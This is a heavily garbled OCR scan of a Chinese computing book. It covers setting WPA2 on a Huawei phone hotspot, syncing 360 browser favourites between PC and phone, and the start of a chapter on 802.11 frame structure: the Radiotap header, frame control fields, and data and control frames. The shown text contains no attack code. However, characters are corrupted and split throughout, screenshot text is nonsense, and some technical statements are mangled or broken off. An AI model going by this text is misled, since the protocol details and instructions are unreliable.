SI [step 图 在 计算 机 中 打开 360 安 全 浏览 器 8.1， 
HUAWEI C8815 如 下 图 所 示 。 


WPA PSK N 和 
WPA2 PSK 后 : 
Ee 图 选择 好 加 密 方式 后 ， 即 可 在 下 方 显 示 二 
密码 输入 框 ， 在 其 中 输入 密码 ， 然 后 单 击 和 
“保存 ”按钮 即 可 ， 如 下 图 所 示 。 Rim 
[GE 国 单 去 工作 界面 左上 角 的 浏览 器 标志 ， 
在 弹出 的 界面 中 单 击 “ 登 录 账 号 ”按钮 ， 
LAN 如 下 图 所 示 。 
HUAWEI C8815 © i 
TT 加 


关 ” 尖 宝 。 萝 间 ”天 度 汉 乐 “ 严 度 去 


四 小 芙 戏 。 前 小 说 大 : 


荐 让 油条 国 天 有 ,本 千 
光宇 同 网 Ha 
聚 划 看 


as Mrs 由 T 贡 天 名 器 js 


[Be 图 弹出 “登录 360 账 号 ”对 话 框 ， 在 其 
中 输入 账号 与 密码 ， 如 下 图 所 示 。 


Step 图 加 密 完成 后 ， 使 用 计算 机 连接 手机 设 
备 时 ， 系 统 提示 用 户 输入 网 络 安全 密 铀 ， 
如 下 图 所 示 。 
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Er 
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加 新 闻 , 视 全 登录 国 天 洁 -和 
全 罗湖 网 HR 和 

权 划 下。 - 


个 ji, 基 鱼 
49 癌 W 营 光 。 获 庆 汪 要 峭 下 载 PP 扬 [Dd) 


侈 提示 : 如 果 没 有 账号 ， 则 可 以 单 击 “ 免 
费 注册 ”按钮 ， 在 打开 的 界面 中 输入 账号 
与 密码 进行 注册 操作 。 


Q 100% 


输入 完 毕 后 ， 单 二 登录 。 按钮 
es 
中 ， 单 击 浏览 器 左上 角 的 图 标 ， 在 弹出 的 
下 拉 列 表 中 单 击 “ 手 动 同步 ”按钮 ， 如 下 
图 所 示 。 


Er 
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step 图 此 时 ， 可 将 计算 机 中 的 收藏 夹 进行 同 
步 操作 ， 如 下 图 所 示 。 


@ 并 


了 Et=O Unks B00 


we a we I 
360cn 


+ 
me em 
El Ek 

ss 


| 闻 mW 网 H 痛 针 前作 抽风 问答 购 放 机 村 


Fm se 

到 回 最 入 电 玉 09 小满 鸡 。 种 小说 大 全 网 衣 清 医 
站 360R 声 。。 莉 厅 和博 。 因 天 济 , 姜 兴 扫 莉 * 视 所 
0 汪 丰 几 my EL 
要 放 主 O3500m DEL Bl 
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将: 家 易于 网 主音 灾 加 者 

人 社 全 网 当当 网 - 

= 
435 DFW 闪 切 I 和 二 外 如 qo 


sa 进入 手机 操作 环境 当中 ， 点 按 “360 
手机 浏览 器 ”图 标 ， 进 入 手机 360 浏 览 器 工 
作 界面 ， 如 下 图 所 示 。 


选择 城市 


新 浪 ”图 搜狐 同城 ”图 美 团 
国 好 药 四 度 加 京东 回 允 和 
回 好 搜 淘宝 《图 乐 居 天 涯 
赶集 。 国 唯 品 会 ” 周 搜 房 网 携程 


最 常 访问 


人 @ 360 个 人 中 心 - 找 回 


x 360 手 机 抢 票 王 


全 


step 回 点 按 页 面 下方 的 “二 ”按钮 ， 打 开 
手机 360 浏 览 器 的 设置 界面 ， 如 下 图 所 示 。 


收藏 天 历史 

3 昌 过 ; 

设置 电脑 信息 下 载 到 出 
三 器 全 


点 按 “ 收 藏 天 ”图 标 ， 进 入 手机 360 
浏览 器 的 “收藏 天 ”界面 ， 如 下 图 所 示 。 


没有 收藏 记录 


编辑 


同步 


[step 图 点 按 “ 同 步 ” 按 钮 ， 打 开 “ 账 号 登 
录 ” 界 面 ， 如 下 图 所 示 。 
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账号 登录 


简 入 用 户 名 /手机 号 /邮箱 


在 登录 界面 输入 账号 与 密码 ， 这 里 需 
要 注意 的 是 ， 手 机 登录 的 账号 与 密码 与 计 
算 机 登录 的 账号 与 密码 必须 一 致 ， 如 下 图 
所 示 。 
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[step 回 单 击 “立即 登录 ”按钮 ， 即 可 以 会 
员 的 身份 登录 到 手机 360 浏 览 器 当中 ， 在 打 
开 的 界面 中 可 以 看 到 “计算 机 收藏 夹 ” 选 
项 ， 如 下 图 所 示 。 


85 


国 所 脑 收 南 交 > 


编辑 


[see 图 点 按 “ 计 算 机 收藏 大” 选项， 即 可 打 
开 “ 计 算 机 收藏 天 ”操作 界面 ， 在 其 中 可 
以 看 到 计算 机 中 的 收藏 夹 的 网 址 信息 出 现 
在 手机 浏览 器 的 收藏 夹 当 中 ， 这 就 说 明 收 
藏 天 网 址 同步 完成 ， 如 右 图 所 示 。 
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小 试 身手 


练习 1: 
练习 2: 
练习 3: 
练习 4: 


组 建 一 个 简单 的 无 线 网 络 。 
将 手机 接 入 无 线 WiFi。 

手机 共享 计算 机 网 络 上 网 。 
计算 机 共享 手机 网 络 上 网 。 
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无 线 通信 中 ， 所 有 的 数据 都 是 通过 无 线 设备 传送 数据 帧 完成 的 ， 所 以 学 习 无 线 数据 帧 的 
结构 以 及 无 线 通信 的 加 密 原 理 ， 是 提高 无 线 安全 的 基础 。 本 章 介绍 无 线 网 络 数据 帧 的 结构 与 
无 线 通信 的 加 密 原 理 ， 主 要 包括 数据 帧 、 控 制 帧 、 管 理 帧 的 结构 以 及 无 线 通 信 的 加 密 原 理 。 


6.1 数据 帧 


6.1.1 数据 帧 的 结构 


无 线 数 据 帧 的 结构 比较 复杂 ， 包 含 
了 很 多 数据 信息 ， 其 中 Radiotap 头 与 IEEE 
802.11 协 议 头 是 数据 帧 中 的 头 信息 ， 下 面 进 
行 详细 介绍 。 


1. Radiotap 头 


Radiotap 头 是 802.11 帧 注入 和 接收 的 事 
实 标准 ， 所 以 在 研究 无 线 数据 帧 之 前 有 必 
要 了 解 一 下 Radiotap 头 。 

Radiotap 头 包含 了 信号 强度 、 噪 声 强 
度 、 信 道 、 时 间 戳 等 信息 。Radiotap 比 传 
统 的 Prism 或 AVS 头 更 有 灵活 性 ， 支 持 Ra- 
diotap 的 系统 较 多 ， 如 Linux、FreeBSD、 
NetBSD、OpenBSD， 还 有 Windows〔 需 使 
用 AirPcap) ， 厂 家 可 以 根据 自己 的 需要 定 
制 个 性 化 信息 ， 因 此 它 的 长 度 不 固定 。 

Radiotap 的 头 部 定义 如 下 : 


struct ieee80211_radiotap_header { 


u int8 七 it version; 
/+ set to 0 */ 
a inta 七 it _ pad; 
EL 本 it len; 
/* entire length */ 
u int32 t it present; 


/* fields present */ 


} attribute (( packed )); 


主要 参数 介绍 如 下 : 

(1) it version。 表 示 版 本 号 ， 值 始终 
为 0。 

(2) it_pad。 没 有 任何 使 用 价值 ， 仪 仅 
是 为 了 结构 体 对齐 。 


(3) it len。 表 示 长 度 ， 包 括 了 Radio- 
tap 头 部 和 数据 两 部 分 ， 如 果 对 Radiotap 信 
息 不 关心 ， 通 过 该 长 度 计算 可 以 直接 跳 到 苹 
IEEE 802.11 头 部 。 

(4) it present。 表 示 Radiotap 数据 的 

位 掩 码 。Radiotap 的 数据 紧 跟 其 头 部 ， 当 其 
中 的 位 掩 码 为 tue 时 ， 表 示 有 对 应 的 数据 ， 
可 以 认为 每 一 比特 表示 一 种 类 型 。 比 如 bit5 
为 1 表示 有 通道 数据 ， 则 可 以 获取 到 信号 
强度 ， 反 之 是 没有 对 应 的 数据 。 因 此 ，Ra- 
diotap 的 长 度 其 实 是 不 固定 的 。 

Radiotap 头 通过 抓 包 软件 抓 出 来 的 信 
息 ， 如 下 图 所 示 。 


ET2TE ETESJT 34 EYEeS EapEUredT27X DIE5J on interYa6e © 
h 24 


Present flags 是 一 个 32 位 的 标记 ， 下 图 
为 具体 信息 。 


其 中 ，Present flags 数 据 信 息 中 的 Tsft 表 
示 数 据 掩 码 ， 当 Ext 标 记 为 1， 表 明 后 面 还 有 
一 个 flags 的 数据 ， 直 至 最 后 一 个 Present， 当 
Ext 标 记 为 0， 表 示 结 束 Present 的 数据 。 


2. IEEE 802.11 协 议 头 


无 线 网 络 由 于 自身 的 特性 ， 在 传输 过 
程 中 存在 被 窃听 的 缺陷 ， 因 此 学 习 IEEE 
802.11 协 议 头 的 组 成 便 是 整个 无 线 网 络 安全 
的 重 中 之 重 。 不 过 ， 在 学 习 IEEE 802.11 协 
议 头 之 前 需要 先 了 解 以 下 几 个 概念 : 
e DU (Data Unit) 数据 单元 : 信息 传 
输 的 最 小 数据 集合 。 
® MSDU (MAC Service Data Unit): 
MAC 服 务 数据 单元 。 
® MPDU (MAC Protocol Data Unit): 
MAC 协 议 数据 单元 。 
e 传递 过 程 逐 层 封装 (Encapsulation ): 
数据 在 传输 过 程 中 的 封装 方式 ， 下 
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1) Frame Control ( 帧 控制 域 ) 

Frame Control ( 帧 控制 域 ) 包含 下 面 几 
个 部 分 : 

(1) Protocol Version (协议 版 本 占 2 
位 )。IEEE 802.11 协 议 版 本 ， 多 数 情况 为 0。 

(2) Type〔〈 类 型 域 ) 和 Subtype( 子 类 
型 域 ) 共同 指出 帧 的 类 型 。 其 中 ，Type (2 
位 ) 规定 帧 的 具体 用 途 ， 包 括 三 种 类 型 ， 
管理 帧 取 值 为 0， 控 制 帧 取 值 为 1， 数 据 
帧 取 值 为 2。SubType (4 位 ) 为 子 类 型 ， 
根据 Type 的 不 同 对 应 多 个 子 类 型 ， 协 议 
规定 不 同类 型 、 子 类 型 的 帧 完成 不 同 功能 
的 操作 。 

(3) To DS (1 位 ) 。 表 明 该 帧 是 BSS 
向 DS 发 送 的 帧 。 

(4) From DS (1 位 ) 。 表 明 该 帧 是 DS 
向 BSS 发 送 的 帧 。 

To DS 、From DS 这 两 个 字段 的 值 决 定 
MAC 头 中 的 四 个 地 址 字段 的 不 同 定 义 ， 具 
体 如 下 图 所 示 。 


hpkal Layer PDU PPOU) > 


Address2 | Address3 
“1 DA SA BSSID 


ToDs | Fromps Address4 


= MA bayer SOU NPOU) ~ | 


ame | sm 
Nr. 


Addres Flold | < MAC Layer SDU SOU) 


下 面 再 来 认识 一 下 802.11 的 数据 结构 ， 
下 图 为 其 数据 结构 。 


"4 6 6 6 2 6 2304 4 


eR TT 

从 数据 结构 可 以 看 出 ，802.11 MAC 
Header (MAC 头 ) 包括 四 部 分 ， 分 别 是 
Frame Control 〈 帧 控制 域 ) 、Dnuration/ID 
(持续 时 间 / 标 识 ) 、Address〈 地 址 域 ) 和 
Sequence Control〈 序 列 控制 域 。 


~ 
Sm 
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0 1 DA BSSID SA 
1 | 0o BSSID SA DA 
1 | RA TA DA SA 


DA: Destination Addres RA: Recipient Address 
SA: Sourece Address TA: Transmitter Address 


详细 介绍 如 下 : 

® BSSID (Basic Service Set Identifier) : 
基本 服务 集 标识 符 。 

® DA (Destination Address) : 
地 址 。 

e@ SA (Sender Address) : 源 地 址 。 

e@ RA (Receiver Address) : 接收 端 地 
址 。 

e@ TA (Transmission Address) : 发 送 
端 地 址 。 

® WDS (Wireless Distribution System) : 
无 线 分 布 式 系统 。 

四 个 字段 的 取 值 如 下 : 

e 0x00: 出 现在 IBSS 环 境 中 〈 可 能 是 
管理 帧 或 者 是 控制 帧 类 型 ) ;或 者 
是 STSL (Station to Station Link) 中 


目的 


两 个 STA 间 的 通信 ， 这 种 情况 下 通 
信 不 经 过 AP。 

e 0x01: 表示 Data 帧 从 AP 端 发 向 
STA 端 。 

e 0x02: 表示 Data 帧 从 STA 端 发 向 
AP 端 。 

e 0x03: 表示 两 个 AP 间 的 通信 ， 
这 是 典型 的 WDS (Wireless 
Distribution System) 环境 下 AP 间 
的 通信 ， 或 者 表示 Mesh 环 境 下 MP 
间 的 通信 ; 只 有 此 时 才 会 使 用 到 
Address4 地 址 段 。 


侈 注意 :; 只 有 单 播 接收 地 址 的 帧 才 会 被 分 
段 ， 广 播 帧 、 组 播 帧 不 适用 该 位 。 


(5) More Frag ( 占 1 位 ) 。 用 于 说 明 
长 帧 被 分 段 的 情况 ， 是 否 有 后 续 数 据 ， 当 
取 值 为 1 时 表示 有 后 续 数 据 ， 可 能 是 数据 
帧 或 者 管理 帧 类 型 。 

(6) Retry ( 重 传 域 占 1 位 ) 。 是 否 重 传 ， 
取 值 为 1 表示 重 传 数据 ， 可 能 是 数据 帧 或 
管理 帧 类 型 ， 接 收 端 进程 使 用 此 位 判断 帧 
是 否 重复 。 

(7) Pwr Mgt《〈 能 量 管理 域 占 1 位 ) 。 
省 电 模式 ， 取 值 为 1 时 表示 STA 处 于 省 电 
模式 ， 此 时 由 STA 向 AP 发 送 该 值 为 1 的 
帧 (AP 不 使 用 该 字段 ) ， 省 电 模 式 下 STA 
不 接收 除 唤 醒 帧 之 外 的 帧 数据 ， 发 送 给 它 
的 数据 帧 由 AP 进行 缓存 。 

(8) More Data (更 多 数据 域 占 1 位 ) 。 
如 果 是 值 为 1 表明 至 少 还 有 一 个 数据 帧 要 
发 送 给 STA。 当 AP 缓存 了 至 少 一 个 MSDU 
时 ， 会 向 省 电 模 式 的 STA 发 送 该 位 为 1 的 
帧 ， 表 示 有 缓存 数据 需要 STA 进行 接收 ， 
接收 到 此 帧 的 STA 会 被 唤醒 并 向 AP 发 送 
PS-Poll 帧 ， 取 回 由 AP 代为 存放 的 数据 ; 
该 位 也 被 AP 用 于 有 更 多 的 广播 、 多 播 帧 需 
要 发 送 的 情况 。 

(9) Protected Frame ( 占 1 位 ) 。 可 能 
是 数据 帧 或 者 管理 帧 类 型 ， 表示 MSDU 
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是 否 被 加 密 ; 也 用 于 表示 PSK 身份 验证 
Frame#3 帧 ， 数 据 载荷 位 为 空 时 ， 该 字段 取 
值 为 0。 

(10) Order (序号 域 占 1 位 ，: 在 非 
QoS 帧 的 情况 下 ， 取 值 为 1 表示 数据 必须 严 
格 按照 顺序 处 理 ， 通 常情 况 下 该 字段 为 0。 

2) DurationID (持续 时 间 / 标 识 ) 

Dnuration/ID (持续 时 间 / 标 识 ) ， 表 
明 该 帧 和 它 的 确认 帧 将 会 占用 信道 多 长 时 
间 ; 对 于 帧 控制 域 子 类 型 为 Power Save-PoII 
的 帧 ， 该 域 表 示 了 STA 的 连接 身份 (AID， 
Association Indentification) 。 

3) Address〈 地 址 域 ) 

Address (地 址 域 ) 包括 源 地 址 

(SA) 、 目 的 地 址 (DA) 、 传 输 工 作 站 
地 址 (TA) 和 接收 工作 站 地 址 (RA) 。 
SA 与 DA 必 不 可 少 ， 后 两 地 址 只 针对 BSS 的 
通信 才 有 用 ， 而 目的 地 址 可 以 为 单 播 地 址 
(CUnicast address) 、 多 播 地 址 〈Multicast ad- 
dress) 、 广 播 地 址 (Broadcast address) 等。 

4) Sequence Control (序列 控制 域 ) 

Sequence Control〈 序 列 控制 域 ) : 由 
代表 MSDU (MAC Server Data Unit) 或 者 
MMSDU (MAC Management Server Data 
Unit) 的 12 位 序列 号 〈Sequence Number) 
和 表示 MSDU 和 MMSDU 的 每 一 个 片段 的 编 
号 的 4 位 片段 号 组 成 (Fragment Number) 。 

5) 802.11 的 其 他 数据 结构 

802.11 的 数据 结构 还 存在 有 其 他 部 分 ， 
包括 Frame Body〔 帧 体 部 分 ) 和 FCS 〈 校 验 
码 ) ， 其 中 Frame Body〈 帧 体 部 分 ) ， 包 
含 信息 根据 帧 的 类 型 有 所 不 同 ， 主 要 封装 
的 是 上 层 的 数据 单元 ， 长 度 为 0~2312 个 字 
节 ， 可 以 推出 ，802.11 帧 最 大 长 度 为 2346 
个 字 节 。FCS 〈 校 验 码 ) 包含 32 位 完整 性 
校 验 码 。 

针对 帧 的 不 同 功能 ， 可 将 802.11 中 的 
MAC 帧 分 为 以 下 三 类 : 

e 数据 帧 : 用 于 在 竞争 期 和 非 竞争 期 

传输 数据 。 
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e 控制 帧 : 用 于 竞争 期 间 的 握手 通信 
和 正 向 确认 ， 为 数据 帧 的 发 送 提供 
辅助 功能 。 

e 管理 帧 : 主要 用 于 STA 与 AP 之 间 协 
商 、 关 系 的 控制 ， 如 关联 、 认 证 、 
同步 等 。 


( 侈 提示 : Frame Control ( 帧 控制 ) 中 的 Type 
(类 型 ) 和 Subtype ( 子 类 型 ) 共同 指出 帧 
的 类 型 ， 当 Type 的 B3B2 位 为 00 时 ， 该 帧 为 
管理 帧 ;为 01 时 ， 该 帧 为 控制 帧 ;为 10 时 ， 
该 帧 为 数据 帧 。 而 Subtype 进 一 步 判 断 帧 类 
型 ， 如 管理 帧 又 分 为 关联 帧 和 认证 帧 。 


号 6.1.2 ”数据 帧 


数据 帧 会 将 上 层 协议 的 数据 置 于 帧 主 
体 加 以 传递 ， 会 用 到 哪些 位 ， 取 决 于 该 数 
据 帧 所 属 的 类 型 ， 本 节 介 绍 两 种 类 型 的 数 
据 帧 ， 一 种 是 Data 数 据 帧 ， 另 一 种 是 Null 数 
据 帧 。 


1. Data 数 据 帧 


Data 数 据 帧 的 作用 在 于 携带 传输 数 
据 ， 它 的 Data 部 分 便 是 需要 传输 的 具体 数 
据 ， 至 于 传输 多 大 的 数据 ， 数 据 使 用 何 种 
方式 进行 加 密 它 并 不 关心 。 

Data 数 据 帧 在 实际 抓 包 软件 中 的 数据 
信息 ， 如 下 图 所 示 。 


= TEEE 892.11 Data FI89S7 .p....F. 
人 全国 bata (ex6926) 
ontrol Field: 6x9842 


， Flags: 6x42 

,999 G000 6969 9969 = Duration: © microseconds 

Broadeast (ff: fr: fT:ff: ff:ff) 
c (69 


Receiver addres: 
ad 


b6:17:57:88:4c) 
ff) 


: 4c) 
roadcast (Tf:TT:TT:TT:TT: Tf) 
ee 9669 = Fragment number: 6 
1998 6169 1910 .... = Sequence number: 2122 


Data: 668fage3bac621fab97531466885cb45c99497c7cafee6aa-. 
[Le ngth: 134] 


2. Null 数 据 帧 


Null 数 据 帧 由 MAC 标 头 与 FCS 结 尾 所 组 
。 当 工作 站 进入 休眠 状态 ， 接 入 点 必须 开 
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始 为 之 暂 存 数据 。 如 果 该 移动 式 工作 站 没有 
数据 要 通过 分 布 式 系统 传输 ， 可 以 使 用 Null 
数据 帧 。Null 数 据 帧 的 用 法 ， 如 下 图 所 示 。 


Null frame: PM=1 


个 


Power 
management=1 


Null 数 据 帧 在 实际 抓 包 软件 中 的 数据 ， 
如 下 图 所 示 。 


~ IEEE 862.11 Null function (No data), Flags: -本 
Type/Subtype: Null function (No data) (6@x6924) 

~ Frame Control Field: 6x4892 

.98 = Version: © 

19.. = Type: Data frane (2) 


Flags 

"ee 9661 ey 1819 = Duration: 314 microseconds 
Receiver address: Hu 03: 43:ab ,74da+1d:93:43:8b) 
Transmitter address: : 

Destination addr 
Source address: Q! 8;5 
BSS Id: 96:88: Se:6a: 1b:28 ( 86:5 
STA address: HuaweiTe 03:43:ab (74 


6060 = Fragment numl 
8661 6666 6161 .... = sequence number: 261 


6.2 ”控制 帧 


控制 帧 主要 用 于 协助 数据 帧 的 传递 ， 
控制 帧 通常 与 数据 帧 搭配 使 用 ， 可 用 于 管 
理 无 线 媒 介 的 访问 、 提 供 MAC 层 的 可 靠 
性 ， 负 责 区 域 的 清空 、 信 道 的 取得 以 及 载 
波 监听 的 维护 等 ， 并 于 收 到 数据 时 予以 正 
面 的 应 答 ， 借 此 促进 工作 站 间 数 据 传输 的 
可 靠 性 。 

控制 帧 中 的 Frame Control 位 ， 结 构 示 意 
如 下 图 所 示 。 


bits 2 2 4 和 和 BM 
Protocol [YPe | sbnpe |olelelelelelele 
1 
Q@Tops 回 Power Management 
@Fromps ® More Data 
© More Fragments © Protected Frame 
@Retry @order 


控制 帧 中 的 Frame Control 位 ， 字 段 的 详 
细 说 明 如 下 : 


(1) Protocol (协议 版 本 ) 。 协 议 版 本 


的 值 为 0， 因为 这 是 目前 绝无仅有 的 版 本 。 

(2) Type〈 类 型 ) 。 控 制 帧 的 类 型 识别 
码 为 01， 所 有 控制 帧 该 位 都 为 01 。 

(3) Subtype〈 次 类 型 ) 。 此 位 代表 发 
送 控制 帧 的 子 类 型 。 

(4) ToDS、FromDS。 控 制 帧 负责 处 理 
无 线 介质 的 访问 ， 因 此 只 能 够 由 无 线 工 作 
站 产生 。 传 输 系统 并 不 会 收发 控制 帧 ， 因 
此 这 两 个 位 为 0。 

(5) More Fragments ( 尚 有 片段 ) 。 控 
制 帧 不 可 能 被 切割 ， 因 此 该 位 为 0。 

(6) Retry 〈 重 试 ) 。 控 制 帧 与 管理 或 
数据 帧 不 同 ， 无 须 在 序列 中 等 待 重 发 ， 因 
此 该 位 为 0。 

(7) Power Management (电源 管理 ) 。 
该 位 用 来 指示 、 完 成 当前 的 帧 交换 过 程 后 ， 
发 送 端的 电源 管理 状态 。 

(8) More Data( 尚 有 数据 ) 。More Data 
位 只 用 于 管理 数据 帧 ， 因 此 在 控制 帧 中 该 
位 为 0。 

(9) Protected Frame〈 受 保护 帧 ) 。 控 
制 帧 不 会 进行 加 密 ， 因 此 对 控制 帧 而 言 ， 
Protected Frame 位 为 0。 

(10) Order (次序) 。 控 制 帧 是 基于 
帧 交换 程序 (atomic frame exchange opera- 
tion) 的 构成 部 件 ， 因 此 必须 依 序 发 送 ， 所 
以 这 个 位 为 0。 

Subtype 与 帧 类 型 的 对 应 ， 其 中 Subtype 
字段 使 用 二 进 制 表示 ， 有 具体 介绍 如 下 。 

@ 1010: Power Save (PS) - Poll (省 

电 一 轮 询 ) 。 
e@ 1011: RTS〔 请 求 发 送 ， 即 : Request 
To Send， 预 约 信道 ， 帧 长 20 字 节 ) 。 
e 1100: CTS (〈 清 除 发 送 ， 即 : Clear To 
Send， 同 意 预 约 ， 帧 长 14 字 节 ) 。 

e 1101: ACK (确认 ) 。 

e 1110: CF-End (无 竞争 周期 结束 )。 

e 1111: CF-End (无 竞争 周期 结束 ) + 

CF-ACK (无 竞争 周期 确认 ) 。 
控制 帧 中 常用 的 四 种 类 型 如 下 : 
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(1) RTS 帧 。 用 来 取得 媒介 的 控制 权 ， 
用 于 传送 分 段 帧 ， 分 段 由 网 卡 驱 动 程序 中 
的 RTS threshold 阀 值 确定 。 

(2) CTS 帧 。 用 于 回复 RTS 帧 ， 如 果 
没有 RTS 当然 也 就 没有 CTS， 它 们 两 个 多 
数 是 成 对 出 现 的 。 

(3) ACK 帧 。MAC 及 任何 数据 的 传送 

(包括 一 般 传送 , RTS/CTS 交换 之 前 的 帧 、 
帧 片段 ) 都 需要 通过 ACK 帧 进行 确认 。 

(4) PS-POLL 帧 。 移 动 式 工作 站 从 省 
电 模 式 苏 醒 后 ， 会 向 AP 传送 一 个 PS-POLL 
帧 用 于 获得 缓存 数据 。 


6.2.1 RTS (请 求 发 送 ) 
告知 其 他 需要 传输 数据 的 客户 端 等 待 ， 避 
免 信 号 干扰 ， 其 中 数据 传输 的 大 小 划分 是 
由 网 卡 驱动 程式 中 的 RTS threshold 六 值 》 
来 定义 。 介 质 访问 权 只 针对 单 点 传播 (uni- 
cast) 帧 使 用 ， 对 于 广播 (broadcast) 与 组 
播 (multicast) 帧 不 受 影响 。 

下 图 为 RTS 帧 的 格式 。 


< MAC Header 二 


Daratlon Recetver Address 


DTeDS 
DFromDs 人 Mor 

DMore Fragments © Protected Frame 
四 Retn @order 


RTS 的 MAC 标 头 由 四 个 位 构成 : 

(1) Frame Control ( 帧 控制 ) 。Frame 
Control 位 并 没有 任何 特殊 之 处 。 帧 的 sub- 
type〈 子 类 型 ) 位 设 定 为 1011， 代 表 RTS 
帧 。 除 此 之 外 ， 它 与 其 他 的 控制 帧 具备 相 
同位 。 (在 IEEE 802.11 协议 中 规定 ， 最 高 
有 效 位 乃 是 最 后 一 个 位 ， 因 此 在 subtype 位 
中 ， 第 7 个 位 代表 最 高 效 位 ) 

(2) Duration 〈 持 续 时 间 ) 。RTS 帧 会 
试图 预定 传输 介质 使 用 权 ， 供 帧 交换 程序 
使 用 ， 因 此 RTS 帧 发 送 者 必须 计算 RTS 帧 
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结束 后 还 需要 多 少时 间 。 
(3) Address 1 位 。Receiver Address ( 接 
收 端 地 址 ) ， 接 收 大 型 帧 的 工作 站 的 地 址 。 
(4) Address 2 位 。Transmitter Address 
(发 送 端 地 址 ) ，RTS 帧 的 发 送 端的 地 址 。 
下 图 为 使 用 抓 包 软件 抓 取 的 实际 RTS 数 


昌 6.2.2 CTS (允许 发 送 ) 


虞 ”CTS 帧 有 两 种 作用 ， 早 先 CTS 帧 仅 用 于 
四 应 答 RTS 帧 ， 如 果 没有 RTS 出 现 ， 就 不 会 产 
响 生 CTS， 后 来 CTS 帧 被 802.11g 防 护 机 制 用 来 
避免 干扰 较 旧 的 工作 站 。 

CTS 帧 的 格式 如 下 图 所 示 。 


MAC Header- 
bytq 2 2 6 4 


Frame | | Duration Receiver Address Fcs 
bits 2 2 4 潮 | 志 | 二 1 下 1 1 1 
Tr Tr Tr 
Type 

Protocol | YPpe | subType=crs |joleleloeleleleje 
@ToDS Power Management 
@ FromDs @ More Data 
© More Fragments © Protected Frame 


CTS 帧 的 MAC 标 头 由 三 个 位 构成 ; 

(1) Frame Control ( 帧 控制 )。 帧 的 
subtype《〈 子 类 型 ) 位 被 设 定 为 1100， 代 表 
CTS 帧 。 

(2) Duration〈 持 续 时 间 ) 。 用 于 应 
答 RTS 时 ，CTS 帧 的 发 送 端 会 以 RTS 帧 的 
Duration 值 作为 持续 时 间 的 计算 基准 。RTS 
会 为 整个 RTS-CTS-frame-ACK 交换 过 程 预 
留 介质 使 用 时 间 。 不 过 ， 当 CTS 帧 被 发 送 
出 后 ， 只 剩 下 其 他 末 帧 或 帧 片段 及 其 回应 待 
传 。CTS 帧 发 送 端 会 将 RTS 帧 的 Duration 值 
减 去 发 送 CTS 帧 及 其 后 短 帧 间隔 所 需 的 时 间 ， 
然后 将 计算 结果 置 于 CTS 的 Duration 位 。 


图 order 


92 


(3) Addressl 位 : Receiver Address 
(接收 端 地 址 ) 。CTS 帧 的 接收 端 即 为 之 
前 RTS 帧 的 发 送 端 ， 因 此 MAC 会 将 RTS 
帧 的 发 送 端 地 址 复制 到 CTS 帧 的 接收 端 地 
址 。802.11g 保护 操作 所 使 用 的 CTS 帧 会 被 
发 送 给 发 出 RTS 的 工作 站 ， 而 且 只 用 来 设 

定 NAV。 
下 图 为 使 用 抓 包 软件 抓 取 的 实际 CTS 数 


Freon pa: 0) (oxe) 


6.2.3 ACK (应 答 ) 


ACK (positive acknowledgment) 帧 是 
MAC 以 及 任何 数据 传输 都 需要 一 个 应 答 ， 
包括 一 般 传输 RTS/CTS 交 换 之 前 的 帧 、 帧 片 
段 ， 服 务 质 量 扩展 功能 放宽 了 个 别 数据 帧 


必须 各 自得 到 应 答 的 要 求 。 
下 图 为 ACK 帧 结构 。 

bytd 加 IAC Header 3 
Eo | Duration Receiver Address Fcs 

bits 2 2 4 ， 和 
Protocol | YPe | subType=ack |oljelelelelelele 


@ToDS 
@FromDS 


© Power Management 
© More Data 

加 Protected Frame 
®Order 


O More Fragments 
@Retry 


ACK 帧 的 MAC 标 头 由 三 个 位 构成 ; 

(1) Frame Control ( 帧 控制 ) 。 帧 的 
subtype〈 子 类 型 ) 位 被 设 定 为 1101， 代 表 
ACK 帧 。 

(2) Duration 〈 持 续 时 间 ) 。 根 据 ACK 
信号 在 整个 帧 交换 过 程 处 于 什么 位 置 ， 
Duration 的 值 可 以 有 两 种 设 定 方式 。 在 完整 
的 数据 帧 及 一 段 连续 帧 片段 的 最 后 一 个 片 
段 中 ，Duration 会 被 设 定 为 0。 数据 发 送 端 
会 将 Frame Control ( 帧 控制 ) 位 中 的 More 


Fragments〈 尚 有 片段 ) 位 设 定 为 0， 表 示 
数据 传输 已 经 结束 。 

如 果 More Fragments 位 为 0， 表 示 整 个 
传输 已 经 完成 ， 不 用 再 延长 对 无 线 信道 的 
控制 权 ， 因 此 会 将 Duration 设 定 为 0。 

如 果 More Fragments 位 为 1， 表 示 还 有 
数据 仍 在 发 送 中 。 此 时 Duration 位 的 用 法 和 
CTS 帧 中 的 Duration 位 相同 。 发 送 ACK 以 及 
短 帧 间隔 所 需要 的 时 间 ， 将 由 最 近 帧 片段 
所 记载 的 Duration 中 减 去 。 如 果 不 是 最 后 
一 个 ACK 帧 ，Duration 的 计算 方式 类 似 CTS 
Duration 的 计算 方式 。 事 实 上 ，IEEE 802.11 
协议 中 将 ACK 帧 中 的 Duration 设 定 称 为 虚拟 
CTS。 

(3) Address 1 位 : Receiver Address( 接 
收 端 地 址 ) 。 

接收 端 地 址 是 由 所 要 应 答 的 发 送 端 帧 
复制 而 来 。 技 术 上 而 言 ， 它 是 由 所 要 应 答 
帧 的 Address 2 位 复制 而 来 。 应 答 主要 是 针 
对 数据 帧 、 管 理 帧 以 及 PS-Poll 帧 。 

下 图 为 使 用 抓 包 软件 抓 取 的 实际 CTS 数 


6.2.4 PS-Poll (省 电 模式 一 轮 询 ) 

当 一 部 移动 工作 站 从 省 电 模 式 中 苏 
醒 ， 便 会 发 送 一 个 PS-Poll 帧 给 接 入 点 ， 
以 取得 任何 暂 存 帧 。 下 图 为 PS-Poll 帧 的 
格式 。 


aie 
Wy 3 


Duration ssiD Transmitter 3 Address re 


PS-Poll 帧 的 MAC 标 头 由 四 个 位 构成 : 
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(1) Frame Control( 帧 控制 ) 。 帧 的 
subtype〈 子 类 型 ) 位 被 设 定 为 1010， 代 表 
PS-Poll 帧 。 

(2) AID (连接 识别 码 ) 。PS-Poll 帧 
将 会 以 MAC 标 头 的 第 三 与 第 四 bit 来 代表 
连接 识别 码 (association ID ) 。 连 接 识别 码 
是 接 入 点 所 指定 的 一 个 数值 ， 用 以 区 别 各 
个 连接 。 将 此 识别 码 置 入 帧 ， 可 让 接 入 点 
找 出 为 其 〈 移 动工 作 站 ) 所 暂 存 的 帧 。 

连接 识别 码 (AID) 在 PS-Poll 帧 中 ， 
Duration/ID 位 是 连接 识别 码 ， 而 非 虚拟 载 
波 侦 测 功 能 所 使 用 的 数值 。 当 移动 工作 站 
与 接 入 点 连接 时 ， 接 入 点 会 从 1-2007 范围 
